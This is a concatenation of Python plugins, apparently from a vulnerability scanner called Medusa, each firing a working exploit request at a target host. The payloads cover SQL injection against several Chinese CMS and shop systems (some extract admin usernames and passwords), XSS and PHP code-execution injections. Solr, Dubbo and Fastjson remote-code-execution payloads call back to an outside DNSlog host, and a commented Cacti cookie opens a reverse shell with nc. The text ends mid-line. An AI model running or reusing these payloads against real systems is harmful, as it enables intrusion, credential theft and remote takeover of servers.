def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: rm = randoms().result(20) payload = "/user/do.php?ac=edit@op=zl" payload_url = scheme + "://" + url + ":" + str(port) + payload referer = scheme + "://" + url Headers["Referer"] = "{}/admin/admin_t ... ;file=artindex.html".format( referer) Headers["Connection"] = "keep-alive" Headers["Content-Type"] = "application/x-www-form-urlencoded" Headers["Content-Length"] = "169" data = "CS_Name=aaaaaa&CS_Email=a%40qq.com&CS_Nichen=aaaaaa&CS_Sex=0&CS_City=%C1%C9%C4%FE%CA%A1&CS_QQ=111111111&CS_Qianm=<isindex type=image src=1 onerror=alert(/{}/)>".format( rm) resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text if con.find("<isindex type=image src=1 onerror=alert(/{}/)>".format( rm)) != -1: Medusa = "{}存在CSDJCMS存储型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/member/record.php' data1 = '?action=pay&mid=-1+union//***/select//***/1,2,md5(c),username,5,6,7,8,9 from destoon_member where admin=1-- a' data2 = '?action=pay&mid=-1+union//***/select//***/1,2,GROUP_CONCAT(DISTINCT+table_name),4,5,6,7,8,9+from+information_schema.columns+where+table_schema=database()--%20a' data3 = '?action=pay&mid=-1+union//***/select//***/1,2,concat(username,0x3A,password),4,5,6,7,8,9%20from%20destoon_member%20where%20admin=1--%20a' payload_url = scheme + "://" + url + ":" + str(port) + payload + data1 headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在DestoonSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/flow.php?step=update_cart' data = "goods_number%5B1%27+and+%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+md5(3.1415)%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+and+1%3D1+%23%5D=1&submit=exp" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.post(payload_url, headers=headers, data=data, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("63e1f04640e83605c1d177544a5a0488") != -1: Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/v5.0/member/record.php' data = '?action=pay&mid=-1/*!50000union*//*!50000select*/user(),2,database(),version(),5,6,7,8,9--' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("admin") != -1: Medusa = "{}存在DestoonSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/admin/affiliate_ck.php?act=list&auid=3+and+updatexml(1,concat(0x7e,concat(md5(c),0x3a,user()),0x7e),1)" data = "status=1&order_sn=2" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.post(payload_url, headers=headers, data=data, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/graph_realtime.php?action=init" payload_url = scheme + "://" + url + ":" + str(port) + payload #如果要反弹shell 把IP 和port改为反弹的目标即可 #然后请求里面价格cookie值 # from urllib.parse import quote # cookies = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port) # cookies = {'Cacti': quote(payload)} headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("poller_realtime.php") != -1: Medusa = "{}存在Cacti任意命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回值:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/easethink_free_v1.4/ajax.php' data = "?act=check_field&field_name=user_name&field_data='and/**/(select/**/1/**/from/**/(select/**/count(*),concat(md5(c),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在EasethinkSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } payload_url=scheme + "://" + url + ":" + str(port) +'/solr/admin/cores' step1 =requests.get(payload_url,timeout=6, headers = headers).text data = json.loads(step1) if 'status' in data: name = '' for x in data['status']: name = x payload = "/solr/"+name+"/dataimport?_=1582117587113&indent=on&wt=json" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'application/json', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest" } DL = Dnslog() # 初始化DNSlog #POC没问题DNSlog有问题 # DL="p61rpm.dnslog.cn" data2="command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22ping+{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format(DL.dns_host()) resp = requests.post(payload_url,data=data2,headers=headers, timeout=20, verify=False) if DL.result(): Medusa = "{}存在Solr远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\nPOST包:{}\r\n".format(url,payload_url,data2) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/admin.php?file=tag&action=preview&tag_code={phpinfo()}' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find("PHP Version") != -1 and con.find( "System") != -1 and con.find("Build Date") != -1 and con.find( "Server API") != -1: Medusa = "{}存在Destoon前台Getshell漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/ecshop/api.php" data = "return_data=json&ac=1&ac=search_goods_list&api_version=1.0&last_modify_st_time=1&pages=1&counts=1 UNION ALL SELECT NULL,CONCAT(0x20,IFNULL(CAST(md5(c) AS CHAR),0x20),0x20)#" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.post(payload_url, headers=headers, data=data, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573%2565%256C%2565%2563%2574%201,md5(4684894),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%20%23" # 爆用户密码用 # payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573 \ # %2565%256C%2565%2563%2574%201,concat(CS_AdminName,0x3a,CS_AdminPass),3,4,5,6,\ # 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,\ # 34,35,36,37,38,39,40,41,42%20from%20cscms_admin%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text if con.find("'904c23abadd5a4648a973c86385f3930'") != -1: Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port Payloads = [ '/ajax.php?act=check_field&field_name=a%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(123),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#', '/link.php?act=go&city=sanming&url=secer%27)%20and%20(updatexml(1,concat(0x3a,(select%20concat(md5(123))%20from%20jytuan_admin%20limit%201)),1))%23', '/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,md5(123),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa', "/subscribe.php?act=unsubscribe&code=secer') and (updatexml(1,concat(0x3a,(select concat(md5(123)) from easethink_admin limit 1)),1))#", "/sms.php?act=do_unsubscribe_verify&mobile=a' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,md5(123),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#" ] for payload in Payloads: try: payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( "202cb962ac59075b964b07152d234b70") != -1: Medusa = "{}存在EasethinkSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/delete_cart_goods.php' data = 'id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.post(payload_url, headers=headers, data=data, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("for key 'group_key'") != -1: Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}" payloadurl = scheme + "://" + url + ":" + str(port) + payload payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}" domain_name = ".".join(url.split(".")[1:]) payloadurl2 = scheme + "://app" + domain_name + ":" + str(port) + payload2 Payloads = [payloadurl, payloadurl2] for payload_url in Payloads: try: headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('PHP Version') != -1 and con.find( 'Configure Command') != -1: Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: rm = randoms().result(20) payload = "/index.php?s=/index/search/index.html" data = {'s': '<script>confirm({})</script>'.format(rm)} payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( "<script>confirm({})</script>".format(rm)) != -1: Medusa = "{}存在EasyCMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL = Dnslog() client = DubboClient(url, int(port)) JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl', dataSource="ldap://" + DL.dns_host(), strMatchColumns=["foo"]) JdbcRowSetImplClass = new_object( 'java.lang.Class', name="com.sun.rowset.JdbcRowSetImpl", ) toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean', beanClass=JdbcRowSetImplClass, obj=JdbcRowSetImpl) resp = client.send_request_and_return_response( service_name= 'org.apache.dubbo.spring.boot.sample.consumer.DemoService', # 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。 method_name='$invoke', args=[toStringBean]) time.sleep(3) if DL.result(): Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2020-1948)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format( url, DL.dns_text(), DL.dns_host(), str(resp)) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/httphandler/getdata.ashx" payload_url = scheme + "://" + url + ":" + str(port) + payload data = "brandid=1%20AND%202391%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28112%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%2899999-33333%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C100%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29" headers = { 'User-Agent': RandomAgent, 'Accept': 'application/json', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 500 and con.find("qpbqq66666qzpxq") != -1: Medusa = "{}存在DaMall商城系统sql注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/dami/index.php?s=/api/ajax_arclist/model/article/field/md5(1)%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("c4ca4238a0b923820dcc509a6f75849b") != -1: Medusa = "{}存在大米CMSSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + '://' + url + ':' + str(port) DL = Dnslog() data = { "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://" + DL.dns_host() + "//Exploit", "autoCommit": True } } data = json.dumps(data) headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/json', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', "Connection": "close", "Accept-Encoding": "gzip, deflate" } resp = requests.post(payload_url, headers=headers, data=data, timeout=10, verify=False) if DL.result() and resp.status_code == 500: Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format( url, payload_url, resp.text, DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ErrorLog().Write(url, _) # 